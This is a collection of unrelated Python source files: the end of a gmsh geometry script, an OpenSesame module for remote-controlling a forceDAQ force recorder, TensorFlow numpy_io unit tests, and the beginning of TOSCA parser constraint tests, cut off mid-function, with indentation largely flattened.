geo_dict = {"gmsh mesh generating sript": __name__,
"xMolecule": x0,
"Number of crosssections": len(e_CrossS),
"Total number of crossections": 4,
"molecule crosses": geo_cs_str,
"popped crossection index": cs_pop_i,
"cs_pop_i": cs_pop_i,
"Typical length scale": lc,
"geo_code": get_code(),
}
return geo_dict
# -----
if __name__ == '__main__':
print(get_geo())
print('\n - This is the sample code for the geo file')
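# A hedged usage sketch: get_geo() reads its geometry parameters from
# params_geo (imported above) and accepts keyword overrides plus an optional
# molecule position x0; the values below are illustrative only.
#
# geo = get_geo(x0=[0.0, 0.0, 0.0], lsam=3.0, angle=20.0)
# open('wei_geometry.geo', 'w').write(geo["geo_code"])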
|
|
# -*- coding: utf-8 -*-
"""
OpenSesame object for the forceDAQ remote control
(c) O. Lindemann
v0.9
"""
from . import remote_control as rc
from libopensesame.experiment import experiment
from libopensesame.exceptions import osexception
from openexp.canvas import canvas
from openexp.keyboard import keyboard
FORCE_SERVER_IP = "192.168.1.1"
WEAK, FINE, STRONG = [0, 1, 2]
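# A hedged usage sketch (the experiment object, server IP, and thresholds are
# illustrative; the methods used here are defined further below):
#
# daq = OpensesameDAQControl(exp)       # exp: a libopensesame experiment
# daq.make_connection(FORCE_SERVER_IP)  # handshake + send data filename
# daq.start()                           # begin force recording
# daq.force_button_box_wait(duration=5000, minimum_level=FINE)
# daq.pause()                           # pause and save data
# daq.quit_recording()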
class OpensesameDAQControl():
def __init__(self, opensesame_experiment):
""" OpenSesame clock and var"""
if isinstance(opensesame_experiment, experiment):
self._exp = opensesame_experiment
else:
raise osexception("opensesame_experiment needs to be an instance of " +\
"opensesame.experiment.experiment")
self.clock = ExpyClock(self._exp.clock)
self.subject_number = self._exp.var.get(u'subject_nr')
self.experiment_name = self._exp.var.get(u'experiment_file').split('.')[0]
self.udp = rc.init_udp_connection()
self._exp.cleanup_functions.append(self.quit_recording)
def __del__(self):
self.quit_recording()
def start(self, time_for_feedback=10):
""" returns true if feedback is OK
waits a particular time (in sec) for feedback and
"""
self.udp.send(rc.Command.START)
self.clock.reset_stopwatch()
kbd = keyboard(self._exp)
while True:
rtn = self.udp.poll()
kbd.get_key(timeout=0) # just for keyboard processing
if rtn == rc.Command.FEEDBACK_STARTED:
break
if self.clock.stopwatch_time > time_for_feedback*1000:
msg = "ERROR: Could not start recording <br/> Press key to quit"
cnv = canvas(self._exp)
cnv.text(msg)
cnv.show()
kbd.get_key()
self._exp.end()
exit()
return True
def stop(self):
self.udp.send(rc.Command.QUIT)
def quit_recording(self):
if self.udp is not None:
self.udp.send(rc.Command.QUIT)
self.udp = None
def pause(self, time_for_feedback=60 * 2, text_saving_time="Please wait..."):
"""Pauses recording. Waits at most `time_for_feedback` seconds for
feedback and returns True if feedback is OK (i.e. the data have been
saved), otherwise False.
"""
self.udp.send(rc.Command.PAUSE)
self.clock.reset_stopwatch()
kbd = keyboard(self._exp)
if text_saving_time is not None:
cnv = canvas(self._exp)
cnv.text(text_saving_time)
cnv.show()
while True:
rtn = self.udp.poll()
kbd.get_key(timeout=1)
if rtn == rc.Command.FEEDBACK_PAUSED:
break
if self.clock.stopwatch_time > time_for_feedback * 1000:
return False
if text_saving_time is not None:
canvas(self._exp).show()
return True
# make connection #
def make_connection(self, ip=FORCE_SERVER_IP):
"""hand shake and filename,
returns forceDAQ version
"""
kbd = keyboard(self._exp)
cnv = canvas(self._exp)
cnv.text("Prepare force recording <br> press key if ready")
cnv.show()
kbd.get_key()
canvas(self._exp).show()
while not self.udp.connect_peer(ip):
cnv = canvas(self._exp)
cnv.text("ERROR while connecting to server <br> try again or Q to quit")
cnv.show()
key = kbd.get_key()
if key[0] == u'q':
msg = "Experiment quitted by user!"
self.udp.send(rc.Command.QUIT)
print(msg)
self._exp.end()
exit()
canvas(self._exp).show()
self.clock.wait(300)
cnv = canvas(self._exp)
cnv.text("Connected")
cnv.show()
self.clock.wait(500)
self.udp.send(rc.Command.FILENAME.decode('utf-8', 'replace') + "{0}_{1}.csv".format(self.experiment_name,
self.subject_number))
rtn = self.udp.receive(5) # paused
if rtn is None:
msg = "Force server not responding"
cnv = canvas(self._exp)
cnv.text(msg)
cnv.show()
kbd.get_key()
self.udp.send(rc.Command.QUIT)
print(msg)
self._exp.end()
exit()
version = rc.get_data(rc.Command.GET_VERSION)
if version is None:
version = "" # FIXME Why is version somethimes None
cnv = canvas(self._exp)
cnv.text("Connected <br> Version " + version)
cnv.show()
self.clock.wait(1000)
return version
def force_button_box_prepare(self, n_sensors=1):
self.udp.clear_receive_buffer()
self.udp.send(rc.Command.SET_LEVEL_CHANGE_DETECTION)
if n_sensors>1:
self.udp.send(rc.Command.SET_LEVEL_CHANGE_DETECTION2)
def force_button_box_check(self):
"""
changes to level
"""
evt, level = rc.poll_multiple_events([rc.Command.CHANGED_LEVEL,
rc.Command.CHANGED_LEVEL2])
if evt is not None:
if evt == rc.Command.CHANGED_LEVEL:
sensor = 1
else:
sensor = 2
return (sensor, level)
return (None, None)
def force_button_box_wait(self, duration=None, minimum_level=-1):
"""
returns if one of two sensors changes its level
"""
self.clock.reset_stopwatch()
kbd = keyboard(self._exp)
last_key = None
rt = None
self.force_button_box_prepare()
while not (duration is not None and self.clock.stopwatch_time > duration):
sensor, level = self.force_button_box_check()
if sensor is not None:
if level >= minimum_level:
rt = self.clock.stopwatch_time
break
else:
self.force_button_box_prepare()
sensor = None
last_key, _ = kbd.get_key(timeout=0)
if last_key is not None:
break
return sensor, level, rt, last_key
def wait_no_button_pressed(self, feedback_stimulus_text=None, polling_intervall=500):
"""level detection needs to be switch on
display feedback_stimulus (optional) if one button pressed
"""
if rc.get_data(rc.Command.GET_THRESHOLD_LEVEL) > 0 or \
rc.get_data(rc.Command.GET_THRESHOLD_LEVEL) > 0:
if feedback_stimulus_text is not None:
cnv = canvas(self._exp)
cnv.text(feedback_stimulus_text)
cnv.show()
kbd = keyboard(self._exp)
while rc.get_data(rc.Command.GET_THRESHOLD_LEVEL) > 0 or \
rc.get_data(rc.Command.GET_THRESHOLD_LEVEL2) > 0:
kbd.get_key(timeout=polling_intervall)
def set_thresholds(self, lower, upper):
rc.set_force_thresholds(lower=lower, upper=upper)
def hold_check(self, holding_time=3000,
left_pos=-200, right_pos=200, radius=50,
col_fine='gray',
col_too_low='green',
col_too_strong='red',
n_sensors=2):
kbd = keyboard(self._exp)
blank = canvas(self._exp)
blank.show()
self.udp.send("hold:test")
self.clock.reset_stopwatch()
prev_lv = None
while True:
self.udp.clear_receive_buffer()
lv = [rc.get_data(rc.Command.GET_THRESHOLD_LEVEL)]
if n_sensors>1:
lv.append(rc.get_data(rc.Command.GET_THRESHOLD_LEVEL2))
else:
lv.append(lv[0]) # duplicate the reading if only one sensor is used
if prev_lv != lv:
# level has changed
self.clock.reset_stopwatch()
prev_lv = lv
cnv = canvas(self._exp)
for i, pos in enumerate([left_pos, right_pos]):
if lv[i] == WEAK:
cnv.circle(x=pos, y=0, r=radius, fill=True,
color=col_too_low)
elif lv[i] == STRONG:
cnv.circle(x=pos, y=0, r=radius, fill=True,
color=col_too_strong)
elif lv[i] == FINE:
cnv.circle(x=pos, y=0, r=radius, fill=True,
color=col_fine)
cnv.show()
key, _ = kbd.get_key(timeout=0)
if (lv == [FINE, FINE] and self.clock.stopwatch_time > holding_time) or\
(key is not None):
break
blank.show()
class ExpyClock():
"""Expyriment-like stopwatch based on Opensesame clock"""
def __init__(self, opensesame_clock):
self._clock = opensesame_clock
self.reset_stopwatch()
@property
def time(self):
return self._clock.time()
@property
def stopwatch_time(self):
return self._clock.time() - self._start
def reset_stopwatch(self):
self._start = self._clock.time()
def wait(self, waiting_time):
return self._clock.sleep(waiting_time)
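# A minimal usage sketch, assuming a running libopensesame experiment
# instance `exp` (e.g. inside an inline_script item); the function name
# and the 5000 ms wait duration are illustrative, not part of the API.
def _example_force_trial(exp):
    """Hedged sketch of a typical trial flow with the classes above."""
    daq = OpensesameDAQControl(exp)
    daq.make_connection()  # handshake with the server, sends the filename
    daq.start()  # begin force recording
    # wait for a level change on either sensor, a key press, or 5 s
    sensor, level, rt, key = daq.force_button_box_wait(duration=5000)
    daq.pause()  # pause and wait until the data are saved
    daq.stop()
    return sensor, level, rt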
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for numpy_io."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.client import session as session_lib
from tensorflow.python.estimator.inputs import numpy_io
from tensorflow.python.feature_column import feature_column_lib as fc
from tensorflow.python.feature_column.feature_column import _LinearModel
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
from tensorflow.python.training import coordinator
from tensorflow.python.training import monitored_session
from tensorflow.python.training import queue_runner_impl
class NumpyIoTest(test.TestCase):
def testNumpyInputFn(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
y = np.arange(-32, -28)
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features, target = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [0, 1])
self.assertAllEqual(res[0]['b'], [32, 33])
self.assertAllEqual(res[1], [-32, -31])
session.run([features, target])
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
coord.request_stop()
coord.join(threads)
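# The tests below all share this queue-runner lifecycle. A hedged
# standalone sketch of the same flow (values illustrative), using the
# MonitoredSession that later tests in this file also use:
#
#   input_fn = numpy_io.numpy_input_fn(
#       {'a': np.arange(4)}, np.arange(4),
#       batch_size=2, shuffle=False, num_epochs=1)
#   features, target = input_fn()
#   with monitored_session.MonitoredSession() as session:
#       while not session.should_stop():
#           session.run([features, target])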
def testNumpyInputFnWithVeryLargeBatchSizeAndMultipleEpochs(self):
a = np.arange(2) * 1.0
b = np.arange(32, 34)
x = {'a': a, 'b': b}
y = np.arange(-32, -30)
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=128, shuffle=False, num_epochs=2)
features, target = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [0, 1, 0, 1])
self.assertAllEqual(res[0]['b'], [32, 33, 32, 33])
self.assertAllEqual(res[1], [-32, -31, -32, -31])
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithZeroEpochs(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
y = np.arange(-32, -28)
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=0)
features, target = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithBatchSizeNotDividedByDataSize(self):
batch_size = 2
a = np.arange(5) * 1.0
b = np.arange(32, 37)
x = {'a': a, 'b': b}
y = np.arange(-32, -27)
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=batch_size, shuffle=False, num_epochs=1)
features, target = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [0, 1])
self.assertAllEqual(res[0]['b'], [32, 33])
self.assertAllEqual(res[1], [-32, -31])
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [2, 3])
self.assertAllEqual(res[0]['b'], [34, 35])
self.assertAllEqual(res[1], [-30, -29])
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [4])
self.assertAllEqual(res[0]['b'], [36])
self.assertAllEqual(res[1], [-28])
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithBatchSizeNotDividedByDataSizeAndMultipleEpochs(self):
batch_size = 2
a = np.arange(3) * 1.0
b = np.arange(32, 35)
x = {'a': a, 'b': b}
y = np.arange(-32, -29)
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=batch_size, shuffle=False, num_epochs=3)
features, target = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [0, 1])
self.assertAllEqual(res[0]['b'], [32, 33])
self.assertAllEqual(res[1], [-32, -31])
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [2, 0])
self.assertAllEqual(res[0]['b'], [34, 32])
self.assertAllEqual(res[1], [-30, -32])
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [1, 2])
self.assertAllEqual(res[0]['b'], [33, 34])
self.assertAllEqual(res[1], [-31, -30])
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [0, 1])
self.assertAllEqual(res[0]['b'], [32, 33])
self.assertAllEqual(res[1], [-32, -31])
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [2])
self.assertAllEqual(res[0]['b'], [34])
self.assertAllEqual(res[1], [-30])
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithBatchSizeLargerThanDataSize(self):
batch_size = 10
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
y = np.arange(-32, -28)
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=batch_size, shuffle=False, num_epochs=1)
features, target = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [0, 1, 2, 3])
self.assertAllEqual(res[0]['b'], [32, 33, 34, 35])
self.assertAllEqual(res[1], [-32, -31, -30, -29])
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithDifferentDimensionsOfFeatures(self):
a = np.array([[1, 2], [3, 4]])
b = np.array([5, 6])
x = {'a': a, 'b': b}
y = np.arange(-32, -30)
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features, target = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [[1, 2], [3, 4]])
self.assertAllEqual(res[0]['b'], [5, 6])
self.assertAllEqual(res[1], [-32, -31])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithXAsNonDict(self):
x = list(range(32, 36))
y = np.arange(4)
with self.test_session():
with self.assertRaisesRegexp(TypeError, 'x must be a dict or array'):
failing_input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
failing_input_fn()
def testNumpyInputFnWithXIsEmptyDict(self):
x = {}
y = np.arange(4)
with self.test_session():
with self.assertRaisesRegexp(ValueError, 'x cannot be an empty'):
failing_input_fn = numpy_io.numpy_input_fn(x, y, shuffle=False)
failing_input_fn()
def testNumpyInputFnWithXIsEmptyArray(self):
x = np.array([[], []])
y = np.arange(4)
with self.test_session():
with self.assertRaisesRegexp(ValueError, 'x cannot be an empty'):
failing_input_fn = numpy_io.numpy_input_fn(x, y, shuffle=False)
failing_input_fn()
def testNumpyInputFnWithYIsNone(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
y = None
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features_tensor = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
feature = session.run(features_tensor)
self.assertEqual(len(feature), 2)
self.assertAllEqual(feature['a'], [0, 1])
self.assertAllEqual(feature['b'], [32, 33])
session.run([features_tensor])
with self.assertRaises(errors.OutOfRangeError):
session.run([features_tensor])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithNonBoolShuffle(self):
x = np.arange(32, 36)
y = np.arange(4)
with self.test_session():
with self.assertRaisesRegexp(ValueError,
'shuffle must be provided and explicitly '
'set as boolean'):
# Default shuffle is None.
numpy_io.numpy_input_fn(x, y)
def testNumpyInputFnWithTargetKeyAlreadyInX(self):
array = np.arange(32, 36)
x = {'__target_key__': array}
y = np.arange(4)
with self.test_session():
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
input_fn()
self.assertAllEqual(x['__target_key__'], array)
# The input x should not be mutated.
self.assertItemsEqual(x.keys(), ['__target_key__'])
def testNumpyInputFnWithMismatchLengthOfInputs(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
x_mismatch_length = {'a': np.arange(1), 'b': b}
y_longer_length = np.arange(10)
with self.test_session():
with self.assertRaisesRegexp(
ValueError, 'Length of tensors in x and y is mismatched.'):
failing_input_fn = numpy_io.numpy_input_fn(
x, y_longer_length, batch_size=2, shuffle=False, num_epochs=1)
failing_input_fn()
with self.assertRaisesRegexp(
ValueError, 'Length of tensors in x and y is mismatched.'):
failing_input_fn = numpy_io.numpy_input_fn(
x=x_mismatch_length,
y=None,
batch_size=2,
shuffle=False,
num_epochs=1)
failing_input_fn()
def testNumpyInputFnWithYAsDict(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
y = {'y1': np.arange(-32, -28), 'y2': np.arange(32, 28, -1)}
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features_tensor, targets_tensor = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
features, targets = session.run([features_tensor, targets_tensor])
self.assertEqual(len(features), 2)
self.assertAllEqual(features['a'], [0, 1])
self.assertAllEqual(features['b'], [32, 33])
self.assertEqual(len(targets), 2)
self.assertAllEqual(targets['y1'], [-32, -31])
self.assertAllEqual(targets['y2'], [32, 31])
session.run([features_tensor, targets_tensor])
with self.assertRaises(errors.OutOfRangeError):
session.run([features_tensor, targets_tensor])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithYIsEmptyDict(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
y = {}
with self.test_session():
with self.assertRaisesRegexp(ValueError, 'y cannot be empty'):
failing_input_fn = numpy_io.numpy_input_fn(x, y, shuffle=False)
failing_input_fn()
def testNumpyInputFnWithDuplicateKeysInXAndY(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
y = {'y1': np.arange(-32, -28), 'a': a, 'y2': np.arange(32, 28, -1), 'b': b}
with self.test_session():
with self.assertRaisesRegexp(
ValueError, '2 duplicate keys are found in both x and y'):
failing_input_fn = numpy_io.numpy_input_fn(x, y, shuffle=False)
failing_input_fn()
def testNumpyInputFnWithXIsArray(self):
x = np.arange(4) * 1.0
y = np.arange(-32, -28)
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features, target = input_fn()
with monitored_session.MonitoredSession() as session:
res = session.run([features, target])
self.assertAllEqual(res[0], [0, 1])
self.assertAllEqual(res[1], [-32, -31])
session.run([features, target])
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
def testNumpyInputFnWithXIsNDArray(self):
x = np.arange(16).reshape(4, 2, 2) * 1.0
y = np.arange(-48, -32).reshape(4, 2, 2)
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features, target = input_fn()
with monitored_session.MonitoredSession() as session:
res = session.run([features, target])
self.assertAllEqual(res[0], [[[0, 1], [2, 3]], [[4, 5], [6, 7]]])
self.assertAllEqual(
res[1], [[[-48, -47], [-46, -45]], [[-44, -43], [-42, -41]]])
session.run([features, target])
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
def testNumpyInputFnWithXIsArrayYIsDict(self):
x = np.arange(4) * 1.0
y = {'y1': np.arange(-32, -28)}
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features_tensor, targets_tensor = input_fn()
with monitored_session.MonitoredSession() as session:
features, targets = session.run([features_tensor, targets_tensor])
self.assertEqual(len(features), 2)
self.assertAllEqual(features, [0, 1])
self.assertEqual(len(targets), 1)
self.assertAllEqual(targets['y1'], [-32, -31])
session.run([features_tensor, targets_tensor])
with self.assertRaises(errors.OutOfRangeError):
session.run([features_tensor, targets_tensor])
def testArrayAndDictGiveSameOutput(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x_arr = np.vstack((a, b))
x_dict = {'feature1': x_arr}
y = np.arange(-48, -40).reshape(2, 4)
input_fn_arr = numpy_io.numpy_input_fn(
x_arr, y, batch_size=2, shuffle=False, num_epochs=1)
features_arr, targets_arr = input_fn_arr()
input_fn_dict = numpy_io.numpy_input_fn(
x_dict, y, batch_size=2, shuffle=False, num_epochs=1)
features_dict, targets_dict = input_fn_dict()
with monitored_session.MonitoredSession() as session:
res_arr, res_dict = session.run([
(features_arr, targets_arr), (features_dict, targets_dict)])
self.assertAllEqual(res_arr[0], res_dict[0]['feature1'])
self.assertAllEqual(res_arr[1], res_dict[1])
class FeatureColumnIntegrationTest(test.TestCase):
def _initialized_session(self, config=None):
sess = session_lib.Session(config=config)
sess.run(variables_lib.global_variables_initializer())
sess.run(lookup_ops.tables_initializer())
return sess
def _get_linear_model_bias(self, name='linear_model'):
with variable_scope.variable_scope(name, reuse=True):
return variable_scope.get_variable('bias_weights')
def _get_linear_model_column_var(self, column, name='linear_model'):
return ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES,
name + '/' + column.name)[0]
def _get_keras_linear_model_predictions(
self,
features,
feature_columns,
units=1,
sparse_combiner='sum',
weight_collections=None,
trainable=True,
cols_to_vars=None):
keras_linear_model = _LinearModel(
feature_columns,
units,
sparse_combiner,
weight_collections,
trainable,
name='linear_model')
retval = keras_linear_model(features) # pylint: disable=not-callable
if cols_to_vars is not None:
cols_to_vars.update(keras_linear_model.cols_to_vars())
return retval
def test_linear_model_numpy_input_fn(self):
price = fc.numeric_column('price')
price_buckets = fc.bucketized_column(price, boundaries=[0., 10., 100.,])
body_style = fc.categorical_column_with_vocabulary_list(
'body-style', vocabulary_list=['hardtop', 'wagon', 'sedan'])
input_fn = numpy_io.numpy_input_fn(
x={
'price': np.array([-1., 2., 13., 104.]),
'body-style': np.array(['sedan', 'hardtop', 'wagon', 'sedan']),
},
batch_size=2,
shuffle=False)
features = input_fn()
net = fc.linear_model(features, [price_buckets, body_style])
# self.assertEqual(1 + 3 + 5, net.shape[1])
with self._initialized_session() as sess:
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess, coord=coord)
bias = self._get_linear_model_bias()
price_buckets_var = self._get_linear_model_column_var(price_buckets)
body_style_var = self._get_linear_model_column_var(body_style)
sess.run(price_buckets_var.assign([[10.], [100.], [1000.], [10000.]]))
sess.run(body_style_var.assign([[-10.], [-100.], [-1000.]]))
sess.run(bias.assign([5.]))
self.assertAllClose([[10 - 1000 + 5.], [100 - 10 + 5.]], sess.run(net))
coord.request_stop()
coord.join(threads)
def test_linear_model_impl_numpy_input_fn(self):
price = fc.numeric_column('price')
price_buckets = fc.bucketized_column(
price, boundaries=[
0.,
10.,
100.,
])
body_style = fc.categorical_column_with_vocabulary_list(
'body-style', vocabulary_list=['hardtop', 'wagon', 'sedan'])
input_fn = numpy_io.numpy_input_fn(
x={
'price': np.array([-1., 2., 13., 104.]),
'body-style': np.array(['sedan', 'hardtop', 'wagon', 'sedan']),
},
batch_size=2,
shuffle=False)
features = input_fn()
net = self._get_keras_linear_model_predictions(
features, [price_buckets, body_style])
# self.assertEqual(1 + 3 + 5, net.shape[1])
with self._initialized_session() as sess:
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess, coord=coord)
bias = self._get_linear_model_bias()
price_buckets_var = self._get_linear_model_column_var(price_buckets)
body_style_var = self._get_linear_model_column_var(body_style)
sess.run(price_buckets_var.assign([[10.], [100.], [1000.], [10000.]]))
sess.run(body_style_var.assign([[-10.], [-100.], [-1000.]]))
sess.run(bias.assign([5.]))
self.assertAllClose([[10 - 1000 + 5.], [100 - 10 + 5.]], sess.run(net))
coord.request_stop()
coord.join(threads)
def test_functional_input_layer_with_numpy_input_fn(self):
embedding_values = (
(1., 2., 3., 4., 5.), # id 0
(6., 7., 8., 9., 10.), # id 1
(11., 12., 13., 14., 15.) # id 2
)
def _initializer(shape, dtype, partition_info):
del shape, dtype, partition_info
return embedding_values
# price has 1 dimension in input_layer
price = fc.numeric_column('price')
body_style = fc.categorical_column_with_vocabulary_list(
'body-style', vocabulary_list=['hardtop', 'wagon', 'sedan'])
# one_hot_body_style has 3 dims in input_layer.
one_hot_body_style = fc.indicator_column(body_style)
# embedded_body_style has 5 dims in input_layer.
embedded_body_style = fc.embedding_column(body_style, dimension=5,
initializer=_initializer)
input_fn = numpy_io.numpy_input_fn(
x={
'price': np.array([11., 12., 13., 14.]),
'body-style': np.array(['sedan', 'hardtop', 'wagon', 'sedan']),
},
batch_size=2,
shuffle=False)
features = input_fn()
net = fc.input_layer(features,
[price, one_hot_body_style, embedded_body_style])
self.assertEqual(1 + 3 + 5, net.shape[1])
with self._initialized_session() as sess:
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess, coord=coord)
# Each row is formed by concatenating `embedded_body_style`,
# `one_hot_body_style`, and `price` in order.
self.assertAllEqual(
[[11., 12., 13., 14., 15., 0., 0., 1., 11.],
[1., 2., 3., 4., 5., 1., 0., 0., 12]],
sess.run(net))
coord.request_stop()
coord.join(threads)
if __name__ == '__main__':
test.main()
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import yaml
from parser.common import exception
from parser.elements.types.constraints import Constraint
from parser.elements.types.constraints import Schema
from parser.tests.base import TestCase
from parser.utils import yamlparser
class ConstraintTest(TestCase):
def test_schema_dict(self):
tpl_snippet = '''
cpus:
type: integer
description: Number of CPUs for the server.
'''
schema = yamlparser.simple_parse(tpl_snippet)
cpus_schema = Schema('cpus', schema['cpus'])
self.assertEqual(len(cpus_schema), 2)
self.assertEqual('integer', cpus_schema.type)
self.assertEqual('Number of CPUs for the server.',
cpus_schema.description)
self.assertEqual(True, cpus_schema.required)
self.assertIsNone(cpus_schema.default)
def test_schema_not_dict(self):
tpl_snippet = '''
cpus:
- type: integer
- description: Number of CPUs for the server.
'''
schema = yamlparser.simple_parse(tpl_snippet)
error = self.assertRaises(exception.InvalidSchemaError, Schema,
'cpus', schema['cpus'])
self.assertEqual('Schema cpus must be a dict.', str(error))
def test_schema_miss_type(self):
tpl_snippet = '''
cpus:
description: Number of CPUs for the server.
'''
schema = yamlparser.simple_parse(tpl_snippet)
error = self.assertRaises(exception.InvalidSchemaError, Schema,
'cpus', schema['cpus'])
self.assertEqual('Schema cpus must have type.', str(error))
def test_schema_none_description(self):
tpl_snippet = '''
cpus:
type: integer
'''
schema = yamlparser.simple_parse(tpl_snippet)
cpus_schema = Schema('cpus', schema['cpus'])
self.assertEqual('', cpus_schema.description)
def test_invalid_constraint_type(self):
schema = {'invalid_type': 2}
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('Invalid constraint type "invalid_type".',
str(error))
def test_invalid_prop_type(self):
schema = {'length': 5}
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('Constraint type "length" is not valid for '
'data type "integer".', str(error))
def test_invalid_validvalues(self):
schema = {'valid_values': 2}
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('valid_values must be a list.', str(error))
def test_validvalues_validate(self):
schema = {'valid_values': [2, 4, 6, 8]}
constraint = Constraint('prop', Schema.INTEGER, schema)
self.assertIsNone(constraint.validate(4))
def test_validvalues_validate_fail(self):
schema = {'valid_values': [2, 4, 6, 8]}
constraint = Constraint('prop', Schema.INTEGER, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 5)
self.assertEqual('prop: 5 is not an valid value "[2, 4, 6, 8]".',
str(error))
def test_invalid_in_range(self):
snippet = 'in_range: {2, 6}'
schema = yaml.safe_load(snippet)
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('in_range must be a list.', str(error))
def test_in_range_min_max(self):
schema = {'in_range': [2, 6]}
constraint = Constraint('prop', Schema.INTEGER, schema)
self.assertEqual(2, constraint.min)
self.assertEqual(6, constraint.max)
def test_in_range_validate(self):
